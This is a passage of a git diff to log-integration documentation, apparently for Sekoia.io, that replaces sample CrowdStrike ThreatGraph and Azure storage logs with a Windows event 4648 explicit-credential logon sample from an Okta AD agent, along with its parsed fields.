"category": [ "configuration" 
@@ -269,7 +275,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"metadata\":{\"detectionIdString\":\"ldt:9ed90be65f99456c9361141f8cfa39ab:17212155109\",\"eventType\":\"Vertex\",\"edge\":{\"sourceVertexId\":\"pid:9ed90be65f99456c9361141f8cfa39ab:17326818154\",\"type\":\"device\"},\"severity\":{\"name\":\"Critical\",\"code\":5}},\"event\":{\"id\":\"aid:9ed90be65f99456c9361141f8cfa39ab:9ed90be65f99456c9361141f8cfa39ab\",\"customer_id\":\"5d505aca55a145b3bd234c399201f082\",\"scope\":\"device\",\"object_id\":\"9ed90be65f99456c9361141f8cfa39ab\",\"device_id\":\"9ed90be65f99456c9361141f8cfa39ab\",\"vertex_type\":\"device\",\"timestamp\":\"2022-07-28T15:09:51Z\",\"properties\":{\"AgentLoadFlags\":\"0\",\"AgentLocalTime\":\"2022-07-24T20:09:35.793Z\",\"AgentVersion\":\"6.39.15316.0\",\"BaseTime\":\"663896169\",\"BiosManufacturer\":\"American Megatrends Inc.\",\"BiosReleaseDate\":\"12/07/2018\",\"BiosVersion\":\"090008 \",\"BootArgs\":\" NOEXECUTE=OPTIN REDIRECT\",\"BootId\":\"7\",\"BootStatusDataAabEnabled\":\"0\",\"BootStatusDataBootAttemptCount\":\"1\",\"BootStatusDataBootGood\":\"1\",\"BootStatusDataBootShutdown\":\"0\",\"BuildNumber\":\"19042\",\"BuildType\":\"3\",\"ChasisManufacturer\":\"Microsoft 
Corporation\",\"ChassisType\":\"3\",\"CheckedBuild\":\"0\",\"ComputerName\":\"mycomputer\",\"ConfigBuild\":\"1007.3.0015316.10\",\"ConfigIDBase\":\"65994762\",\"ConfigIDBuild\":\"15316\",\"ConfigIDPlatform\":\"3\",\"ConfigStateHash\":\"2445437569\",\"ConfigurationVersion\":\"10\",\"ConnectTime\":\"2022-07-18T09:47:48.602Z\",\"ConnectType\":\"8\",\"ConnectionCipher\":\"26126\",\"ConnectionCipherStrength\":\"128\",\"ConnectionExchange\":\"44550\",\"ConnectionExchangeStrength\":\"255\",\"ConnectionHash\":\"32780\",\"ConnectionHashStrength\":\"0\",\"ConnectionProtocol\":\"2048\",\"ContextTimeStamp\":\"2022-07-24T20:09:35.793Z\",\"CpuFeaturesMask\":\"7037767758369539\",\"CpuSignature\":\"263921\",\"CpuVendor\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"FailedConnectCount\":\"0\",\"InstanceMetadataProvider\":\"2\",\"LocalAddressIP4\":\"1.2.3.4\",\"MachineDomain\":\"\",\"MajorVersion\":\"10\",\"MicrocodeSignature\":\"18446744069414584320\",\"MinorVersion\":\"0\",\"MoboManufacturer\":\"Microsoft Corporation\",\"MoboProductName\":\"Virtual Machine\",\"NetworkContainmentState\":\"0\",\"PhysicalAddress\":\"3a-c7-6c-b1-81-38\",\"PlatformId\":\"2\",\"PlatformSecuritySettings\":\"0\",\"PlatformSecurityStatus\":\"4294967296\",\"PointerSize\":\"8\",\"PreviousConnectTime\":\"1601-01-01T00:00:00.000Z\",\"ProductSku\":\"48\",\"ProductType\":\"1\",\"ProvisionState\":\"1\",\"RFMState\":\"0\",\"ServicePackMajor\":\"0\",\"ServicePackMinor\":\"0\",\"SideChannelMitigationFlags\":\"29444\",\"SubBuildNumber\":\"1706\",\"SuiteMask\":\"272\",\"SystemManufacturer\":\"Microsoft Corporation\",\"SystemProductName\":\"Virtual 
Machine\",\"SystemSerialNumber\":\"0000-0010-2562-7523-7070-7191-32\",\"SystemSku\":\"\",\"TargetFileName\":\"Config.sys\",\"accountId\":\"35f882a7-80ce-4e98-9efb-56f2382b6856\",\"eventPlatformId\":\"0\",\"externalIpAddress\":\"4.3.2.1\",\"instanceId\":\"9ed90be6-5f99-456c-9361-141f8cfa39ab\",\"zone_group\":\"rdp-east-us\"},\"edges\":{\"assigned_ipv4_address\":[{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/ipv4/summary/v1?ids=ip4%3A10.0.4.4%3A10.0.4.4&scope=device\",\"id\":\"ip4:10.0.4.4:10.0.4.4\",\"device_id\":\"10.0.4.4\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"10.0.4.4\",\"direction\":\"out\",\"edge_id\":\"KZZ\\\"V__;Kgi>WZVP5\\\\Ro9MfM']Tc5[VP:C5\\\\od;.hXFhKNnO.RVWpq2h-EaR=a8J)%**N1p(udPF_<1'[/;7\\\\Xnd4%Ia%E3,C4j![?=r-0%.O=l!%&[$5=-si;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%Ot`@k^R;>'_r\\\"+3`-a]]Rj_09,,cO],pXWF.4E@m!!*'!\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"established_user_session\",\"timestamp\":\"2022-07-18T09:50:33Z\",\"properties\":{\"LogonTime\":\"2022-07-18T09:35:03.448Z\",\"LogonType\":\"5\",\"UserIsAdmin\":\"0\",\"UserName\":\"hbmwcsfghmml-vm$\",\"UserPrincipal\":\"\"}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-90-0-1%7C83212&scope=device\",\"id\":\"uses:835449907c99453085a924a16e967be5:S-1-5-90-0-1|83212\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"S-1-5-90-0-1|83212\",\"direction\":\"out\",\"edge_id\":\"KZm:#_CuCKi=crhVJ-[Hi;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%'\\\";HWE\\\\hK)TKK@Ja0+LFZCI_&!(eo>-LOP/PtAeWZBOJ1Y0U*]5Pk6ra*Gdk3JG6dZI]\\\\K%f-i6<7Z\\\\![>1Y0U*]5Pk6ra*Gdk3JE`gl\\\\rW5um]HO@mLoXRZ`!!<<'\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"establ
ished_user_session\",\"timestamp\":\"2022-07-18T09:50:33Z\",\"properties\":{\"LogonTime\":\"2022-07-18T09:35:03.015Z\",\"LogonType\":\"2\",\"UserIsAdmin\":\"0\",\"UserName\":\"UMFD-1\",\"UserPrincipal\":\"\"}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-90-0-3%7C8097548&scope=device\",\"id\":\"uses:835449907c99453085a924a16e967be5:S-1-5-90-0-3|8097548\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"S-1-5-90-0-3|8097548\",\"direction\":\"out\",\"edge_id\":\"KZm:#_CuCKi=crh->=-si;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%Ot`@k^R;>+rfg&K$2nq\\\"456ipPR,LVK2FM\\\",e'D/,>KA*-AH?W)cMZ8D@\\\\!!*'!\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"established_user_session\",\"timestamp\":\"2022-07-18T09:50:33Z\",\"properties\":{\"LogonTime\":\"2022-07-18T09:46:32.280Z\",\"LogonType\":\"2\",\"UserIsAdmin\":\"0\",\"UserName\":\"UMFD-3\",\"UserPrincipal\":\"\"}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-21-2334176487-1093172873-1803758148-1000%7C27181909&scope=device\",\"id\":\"uses:835449907c99453085a924a16e967be5:S-1-5-21-2334176487-1093172873-1803758148-1000|27181909\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"S-1-5-21-2334176487-1093172873-1803758148-1000|27181909\",\"direction\":\"out\",\"edge_id\":\"KZmXm^d&;ti=ug_cXi9L%2VjrCr9H#76G(l^ruhDMrs;W&NI%7/thctFPrRiR'U>dJn!rc-Nd4LV=*ri;lF2!Z\\\"2?31i[d/pMsGcTg;'O$:\\\"1OYFD\\\"hV;6>9Y+\\\\(U:Z!%aA6.b,O_lhHcCESa;hDH`$U42@\\\\cE]Do+ncd#)<1$NL2,rr\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"established_user_session\",\"tim
estamp\":\"2022-07-18T19:46:23Z\",\"properties\":{\"LogonTime\":\"2022-07-18T19:46:21.198Z\",\"LogonType\":\"2\",\"UserIsAdmin\":\"0\",\"UserName\":\"DWM-4\",\"UserPrincipal\":\"\"}}],\"implicated_by_incident\":[{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3Ac46079f88e0643f3a7a1a75897d193f7&scope=device\",\"id\":\"inc:835449907c99453085a924a16e967be5:c46079f88e0643f3a7a1a75897d193f7\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"c46079f88e0643f3a7a1a75897d193f7\",\"direction\":\"out\",\"edge_id\":\"KZr8O__;KaiK^5&s\\\"4s!gB#-mksHj5MJ\\\"SaJXko@pVK^,s)Sh8#d>)\\\\6K\\\"$3EMAIi4,2N#X(JtF)Cnp[mK8^Vlb8-s/Y6=qL6*OR]ZFRf0U3B<<3FrppFLH!j[XcIKKQMs8N\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"implicated_by_incident\",\"timestamp\":\"2022-07-18T17:48:23Z\",\"properties\":{}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3Adaf413dba4ef43148167ee6d244ad364&scope=device\",\"id\":\"inc:835449907c99453085a924a16e967be5:daf413dba4ef43148167ee6d244ad364\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"daf413dba4ef43148167ee6d244ad364\",\"direction\":\"out\",\"edge_id\":\"KZr8O__;KaiKY\\\\Sa4=NC.$apdgX(^P-kt!6kQ3cjL[Tp=YP9%^b\\\\#5\\\")%47l\\\\&OGsVL;7N*EJa&?3rh5.)S'V]b;PA\\\"/!!*'!\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"implicated_by_incident\",\"timestamp\":\"2022-07-23T21:05:32Z\",\"properties\":{}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A1c61fb60a33a4fecb65adcf8e96bbca3&scope=device\",\"id\":\"inc
:835449907c99453085a924a16e967be5:1c61fb60a33a4fecb65adcf8e96bbca3\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"1c61fb60a33a4fecb65adcf8e96bbca3\",\"direction\":\"out\",\"edge_id\":\"KZm;n_a\\\"Jmd4K&PSagPDW+/);%K-Qd6CG4t\\\\q/Z*bB`'eCAn\\\\%el8>uC1Dk3VHYj@<9^!%401L'?GR18>el/s*>pJG1QISImUoC8hpGuqUT%AS>dZG,,V>XS7!T4MeeFj=O!<<'\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"implicated_by_incident\",\"timestamp\":\"2022-07-24T04:01:51Z\",\"properties\":{}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A068b5e72e5624d39b71e03aa0c385c02&scope=device\",\"id\":\"inc:835449907c99453085a924a16e967be5:068b5e72e5624d39b71e03aa0c385c02\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"068b5e72e5624d39b71e03aa0c385c02\",\"direction\":\"out\",\"edge_id\":\"KZq\\\\t\\\"#13LiKbbDqV,Td=k5mC)0-PqJ`,5aBjffnn\\\\+GP[JmP^(hOn!2Q27k>8rTm`\\\\N`qLL\\\"QJ/&41pV'U+#X4n=^kjB!f.A6'S4T?r0b&tr&;.nD$o@h9]bTK0$!l$Y[`Zda*b231!!<<'\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"implicated_by_incident\",\"timestamp\":\"2022-07-24T11:05:05Z\",\"properties\":{}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A3ba3560a57994112a66c91e4e4e66f13&scope=device\",\"id\":\"inc:835449907c99453085a924a16e967be5:3ba3560a57994112a66c91e4e4e66f13\",\"device_id\":\"835449907c99453085a924a16e967be5\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"3ba3560a57994112a66c91e4e4e66f13\",\"direction\":\"out\",\"edge_id\":\"KZl^h!\\\\k*Qi@?5AT=\\\",D6`(M?TZ+km#h$&kn,W(2O71>#cfWZVP5\\\\Ro9MfM']Tc5[VP:C5\\\\od;.hXFhKNnO.R
VWpq2h-EaR=a8J)%**N1p(udPF_<1'[/;7\\\\Xnd4%Ia%E3,C4j![?=r-0%.O=l!%&[$5=-si;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%Ot`@k^R;>'_r\\\"+3`-a]]Rj_09,,cO],pXWF.4E@m!!*'!\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"established_user_session\", \"timestamp\": \"2022-07-18T09:50:33Z\", \"properties\": {\"LogonTime\": \"2022-07-18T09:35:03.448Z\", \"LogonType\": \"5\", \"UserIsAdmin\": \"0\", \"UserName\": \"hbmwcsfghmml-vm$\", \"UserPrincipal\": \"\"}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-90-0-1%7C83212&scope=device\", \"id\": \"uses:835449907c99453085a924a16e967be5:S-1-5-90-0-1|83212\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"S-1-5-90-0-1|83212\", \"direction\": \"out\", \"edge_id\": \"KZm:#_CuCKi=crhVJ-[Hi;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%'\\\";HWE\\\\hK)TKK@Ja0+LFZCI_&!(eo>-LOP/PtAeWZBOJ1Y0U*]5Pk6ra*Gdk3JG6dZI]\\\\K%f-i6<7Z\\\\![>1Y0U*]5Pk6ra*Gdk3JE`gl\\\\rW5um]HO@mLoXRZ`!!<<'\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"established_user_session\", \"timestamp\": \"2022-07-18T09:50:33Z\", \"properties\": {\"LogonTime\": \"2022-07-18T09:35:03.015Z\", \"LogonType\": \"2\", \"UserIsAdmin\": \"0\", \"UserName\": \"UMFD-1\", \"UserPrincipal\": \"\"}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-90-0-3%7C8097548&scope=device\", \"id\": \"uses:835449907c99453085a924a16e967be5:S-1-5-90-0-3|8097548\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"S-1-5-90-0-3|8097548\", \"direction\": \"out\", \"edge_id\": 
\"KZm:#_CuCKi=crh->=-si;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%Ot`@k^R;>+rfg&K$2nq\\\"456ipPR,LVK2FM\\\",e'D/,>KA*-AH?W)cMZ8D@\\\\!!*'!\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"established_user_session\", \"timestamp\": \"2022-07-18T09:50:33Z\", \"properties\": {\"LogonTime\": \"2022-07-18T09:46:32.280Z\", \"LogonType\": \"2\", \"UserIsAdmin\": \"0\", \"UserName\": \"UMFD-3\", \"UserPrincipal\": \"\"}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-21-2334176487-1093172873-1803758148-1000%7C27181909&scope=device\", \"id\": \"uses:835449907c99453085a924a16e967be5:S-1-5-21-2334176487-1093172873-1803758148-1000|27181909\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"S-1-5-21-2334176487-1093172873-1803758148-1000|27181909\", \"direction\": \"out\", \"edge_id\": \"KZmXm^d&;ti=ug_cXi9L%2VjrCr9H#76G(l^ruhDMrs;W&NI%7/thctFPrRiR'U>dJn!rc-Nd4LV=*ri;lF2!Z\\\"2?31i[d/pMsGcTg;'O$:\\\"1OYFD\\\"hV;6>9Y+\\\\(U:Z!%aA6.b,O_lhHcCESa;hDH`$U42@\\\\cE]Do+ncd#)<1$NL2,rr\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"established_user_session\", \"timestamp\": \"2022-07-18T19:46:23Z\", \"properties\": {\"LogonTime\": \"2022-07-18T19:46:21.198Z\", \"LogonType\": \"2\", \"UserIsAdmin\": \"0\", \"UserName\": \"DWM-4\", \"UserPrincipal\": \"\"}}], \"implicated_by_incident\": [{\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3Ac46079f88e0643f3a7a1a75897d193f7&scope=device\", \"id\": \"inc:835449907c99453085a924a16e967be5:c46079f88e0643f3a7a1a75897d193f7\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": 
\"46de5283260647ec8f28def00bffd094\", \"object_id\": \"c46079f88e0643f3a7a1a75897d193f7\", \"direction\": \"out\", \"edge_id\": \"KZr8O__;KaiK^5&s\\\"4s!gB#-mksHj5MJ\\\"SaJXko@pVK^,s)Sh8#d>)\\\\6K\\\"$3EMAIi4,2N#X(JtF)Cnp[mK8^Vlb8-s/Y6=qL6*OR]ZFRf0U3B<<3FrppFLH!j[XcIKKQMs8N\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"implicated_by_incident\", \"timestamp\": \"2022-07-18T17:48:23Z\", \"properties\": {}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3Adaf413dba4ef43148167ee6d244ad364&scope=device\", \"id\": \"inc:835449907c99453085a924a16e967be5:daf413dba4ef43148167ee6d244ad364\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"daf413dba4ef43148167ee6d244ad364\", \"direction\": \"out\", \"edge_id\": \"KZr8O__;KaiKY\\\\Sa4=NC.$apdgX(^P-kt!6kQ3cjL[Tp=YP9%^b\\\\#5\\\")%47l\\\\&OGsVL;7N*EJa&?3rh5.)S'V]b;PA\\\"/!!*'!\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"implicated_by_incident\", \"timestamp\": \"2022-07-23T21:05:32Z\", \"properties\": {}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A1c61fb60a33a4fecb65adcf8e96bbca3&scope=device\", \"id\": \"inc:835449907c99453085a924a16e967be5:1c61fb60a33a4fecb65adcf8e96bbca3\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"1c61fb60a33a4fecb65adcf8e96bbca3\", \"direction\": \"out\", \"edge_id\": \"KZm;n_a\\\"Jmd4K&PSagPDW+/);%K-Qd6CG4t\\\\q/Z*bB`'eCAn\\\\%el8>uC1Dk3VHYj@<9^!%401L'?GR18>el/s*>pJG1QISImUoC8hpGuqUT%AS>dZG,,V>XS7!T4MeeFj=O!<<'\", \"source_vertex_id\": 
\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"implicated_by_incident\", \"timestamp\": \"2022-07-24T04:01:51Z\", \"properties\": {}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A068b5e72e5624d39b71e03aa0c385c02&scope=device\", \"id\": \"inc:835449907c99453085a924a16e967be5:068b5e72e5624d39b71e03aa0c385c02\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"068b5e72e5624d39b71e03aa0c385c02\", \"direction\": \"out\", \"edge_id\": \"KZq\\\\t\\\"#13LiKbbDqV,Td=k5mC)0-PqJ`,5aBjffnn\\\\+GP[JmP^(hOn!2Q27k>8rTm`\\\\N`qLL\\\"QJ/&41pV'U+#X4n=^kjB!f.A6'S4T?r0b&tr&;.nD$o@h9]bTK0$!l$Y[`Zda*b231!!<<'\", \"source_vertex_id\": \"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\", \"scope\": \"device\", \"edge_type\": \"implicated_by_incident\", \"timestamp\": \"2022-07-24T11:05:05Z\", \"properties\": {}}, {\"path\": \"http://falconapi.crowdstrike.com/threatgraph/combined/incidents/summary/v1?ids=inc%3A835449907c99453085a924a16e967be5%3A3ba3560a57994112a66c91e4e4e66f13&scope=device\", \"id\": \"inc:835449907c99453085a924a16e967be5:3ba3560a57994112a66c91e4e4e66f13\", \"device_id\": \"835449907c99453085a924a16e967be5\", \"customer_id\": \"46de5283260647ec8f28def00bffd094\", \"object_id\": \"3ba3560a57994112a66c91e4e4e66f13\", \"direction\": \"out\", \"edge_id\": \"KZl^h!\\\\k*Qi@?5AT=\\\",D6`(M?TZ+km#h$&kn,W(2O71>#cf4648001254400x8020000000000000185982314Securitydd.example.orgS-1-5-21-1111111111-2222222222-333333333-44444OktaServiceEXAMPLE0x23b659{bcd3f290-9f73-4e62-a998-475e7db8384c}JDOEXAMPLE{bcd3f290-9f73-4e62-a998-475e7db8384c}localhostlocalhost0x15bcC:\\\\Program Files (x86)\\\\Okta\\\\Okta AD Agent\\\\OktaAgentService.exe--\"}}\n", + "event": { + "code": "4648", + "outcome": "success", + "provider": 
"Microsoft-Windows-Security-Auditing" + }, + "action": { + "id": 4648, + "name": "A logon was attempted using explicit credentials", + "outcome": "success", + "properties": [ + { + "opcode": 0 + } + ], + "record_id": 185982314, + "type": "Security" + }, + "azure_windows": { + "event_data": { + "IpAddress": "-", + "IpPort": "-", + "LogonGuid": "{bcd3f290-9f73-4e62-a998-475e7db8384c}", + "ProcessId": "0x15bc", + "ProcessName": "C:\\Program Files (x86)\\Okta\\Okta AD Agent\\OktaAgentService.exe", + "SubjectDomainName": "EXAMPLE", + "SubjectLogonId": "0x23b659", + "SubjectUserName": "OktaService", + "SubjectUserSid": "S-1-5-21-1111111111-2222222222-333333333-44444", + "TargetDomainName": "EXAMPLE", + "TargetInfo": "localhost", + "TargetLogonGuid": "{bcd3f290-9f73-4e62-a998-475e7db8384c}", + "TargetServerName": "localhost", + "TargetUserName": "JDO" + }, + "opcode": "0", + "provider_guid": "54849625-5478-4994-a5ba-3e3b0328c30d", + "provider_name": "Microsoft-Windows-Security-Auditing", + "task": "12544" + }, + "host": { + "hostname": "dd.example.org", + "name": "dd.example.org" + }, + "log": { + "hostname": "dd.example.org" + }, "os": { "family": "windows", "platform": "windows" }, - "sekoiaio": { - "intake": { - "parsing_warnings": [ - "No fields extracted from original event" - ] + "process": { + "parent": { + "pid": 5564 + }, + "pid": 740, + "thread": { + "id": 1408 } + }, + "related": { + "hosts": [ + "dd.example.org" + ], + "user": [ + "OktaService" + ] + }, + "user": { + "domain": "EXAMPLE", + "id": "S-1-5-21-1111111111-2222222222-333333333-44444", + "name": "OktaService" } } diff --git a/_shared_content/operations_center/integrations/generated/2815eaab-2425-4eff-8038-3f7d5a3b8b11_sample.md b/_shared_content/operations_center/integrations/generated/2815eaab-2425-4eff-8038-3f7d5a3b8b11_sample.md index 2d583dffa9..376cc30460 100644 --- a/_shared_content/operations_center/integrations/generated/2815eaab-2425-4eff-8038-3f7d5a3b8b11_sample.md 
+++ b/_shared_content/operations_center/integrations/generated/2815eaab-2425-4eff-8038-3f7d5a3b8b11_sample.md 
@@ -33,41 +33,30 @@ In this section, you will find examples of raw logs as generated natively by the -=== "invalid_message" +=== "event_4648" ```json { - "time": "2022-03-25T09:08:59.2405321Z", - "resourceId": "/subscriptions/6c5a0310-d590-4fb4-945a-bca5dc5e1417/resourceGroups/MyGroup/providers/Microsoft.Storage/storageAccounts/MyStorageAccount/blobServices/default", - "category": "StorageRead", - "operationName": "GetBlob", - "schemaVersion": "1.0", - "statusCode": 404, - "statusText": "BlobNotFound", - "durationMs": 1, - "callerIpAddress": "1.2.3.4", - "correlationId": "165e8a9d-e08f-43ca-b71b-c2738d24eb66", - "identity": { - "type": "SAS", - "tokenHash": "system-1(D0B3B275891800D74D0362E6A5CEAEEDD93A110636EFF4CC84CFD05396904C1C),SasSignature(B35B17A0B56ABEDF5D04E11B2AE08EBEC2DEC076742040412D3C034880A3D745)" - }, - "location": "MyLocation", + "time": "2024-07-17T08:33:57.4960858Z", + "category": "WindowsEventLogsTable", + "level": "Informational", "properties": { - "accountName": "MyStorageAccount", - "userAgentHeader": "AzSerialConsoleSvcPF", - "serviceType": "blob", - "objectKey": "/MyStorageAccount/bootdiagnostics-xxxxxx-84a8d62f-e62c-4001-9ce2-e6a3e25f4f88/XXXXXX.84a8d62f-e62c-4001-9ce2-e6a3e25f4f88.serialconsole-connectionmetadata", - "lastModifiedTime": "1601/01/01 00:00:00.0000000", - "metricResponseType": "ClientOtherError", - "serverLatencyMs": 1, - "requestHeaderSize": 411, - "responseHeaderSize": 172, - "tlsVersion": "TLS 1.2" - }, - "uri": "https://axenspiproddiag.blob.core.windows.net/bootdiagnostics-azntpi84a8d62f-e62c-4001-9ce2-e6a3e25f4f88/AZNTPI-04.84a8d62f-e62c-4001-9ce2-e6a3e25f4f88.serialconsole-connectionmetadata?sv=2018-03-28&sr=c&sk=system-1&sig=XXXXX&se=9999-01-01T00%3A00%3A00Z&sp=rwd", - "protocol": "HTTPS", - "resourceType": "Microsoft.Storage/storageAccounts/blobServices" + "DeploymentId": "43920203-5403-4d1a-8d59-543458490770", + "Role": "IaaS", + "RoleInstance": "_EX-AZU-NL-PA", + "ProviderGuid": 
"{54849625-5478-4994-a5ba-3e3b0328c30d}", + "ProviderName": "Microsoft-Windows-Security-Auditing", + "EventId": 4648, + "Level": 0, + "Pid": 740, + "Tid": 1408, + "Opcode": 0, + "Task": 12544, + "Channel": "Security", + "Description": "A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1111111111-2222222222-333333333-44444\r\n\tAccount Name:\t\tOktaService\r\n\tAccount Domain:\t\tEXAMPLE\r\n\tLogon ID:\t\t0x111111\r\n\tLogon GUID:\t\t{bcd3f290-9f73-4e62-a998-475e7db8384c}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tJDO\r\n\tAccount Domain:\t\tEXAMPLE\r\n\tLogon GUID:\t\t{bcd3f290-9f73-4e62-a998-475e7db8384c}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x15bc\r\n\tProcess Name:\t\tC:\\Program Files (x86)\\Okta\\Okta AD Agent\\OktaAgentService.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account\u2019s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.", + "RawXml": "4648001254400x8020000000000000185982314Securitydd.example.orgS-1-5-21-1111111111-2222222222-333333333-44444OktaServiceEXAMPLE0x23b659{bcd3f290-9f73-4e62-a998-475e7db8384c}JDOEXAMPLE{bcd3f290-9f73-4e62-a998-475e7db8384c}localhostlocalhost0x15bcC:\\Program Files (x86)\\Okta\\Okta AD Agent\\OktaAgentService.exe--" + } } ``` diff --git a/_shared_content/operations_center/integrations/generated/2886cd2d-f686-4e7d-9976-250cba2eaf5b.md b/_shared_content/operations_center/integrations/generated/2886cd2d-f686-4e7d-9976-250cba2eaf5b.md index 804403164e..50243211e8 100644 --- a/_shared_content/operations_center/integrations/generated/2886cd2d-f686-4e7d-9976-250cba2eaf5b.md 
